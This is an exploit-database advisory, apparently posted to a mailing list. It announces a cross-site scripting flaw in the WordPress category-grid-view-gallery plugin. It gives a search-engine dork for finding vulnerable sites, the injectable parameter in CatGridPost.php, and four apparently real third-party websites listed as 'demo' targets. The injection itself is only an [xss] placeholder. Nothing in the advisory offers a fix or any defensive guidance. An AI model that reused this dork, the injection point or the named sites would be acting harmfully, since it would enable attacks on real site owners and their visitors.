[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

WordPress category-grid-view-galler plugin Cross-Site Scripting Vulnerabilities



The WordPress category-grid-view-galler plugin suffers from a Cross-Site Scripting vulnerability.


#################################

#          Iranian Exploit DataBase

#           http://exploit.iedb.ir

#################################

# Exploit Title : WordPress category-grid-view-galler plugin Cross-Site Scripting Vulnerabilities

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : IeDb.Team@xxxxxxxxx

# Home : http://exploit.iedb.ir

# Software Link : http://wordpress.org/

# Security Risk : High

# Tested on : Linux

# Dork : inurl:/wp-content/plugins/category-grid-view-gallery

#################################

# Exploit :

# http://www.Site.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=[Xss]

# Dem0 :

# http://tapani.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1172[xss]

# http://www.xbladesuk.co.uk/wordpress/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=465[xss]

# http://www.justmarriedwithcoupons.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=15602[xss]

# http://unifyfestival.com/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1712[xss]

#################################

#################################

# Exploit Archive = http://exploit.iedb.ir/exploits-177.html

#################################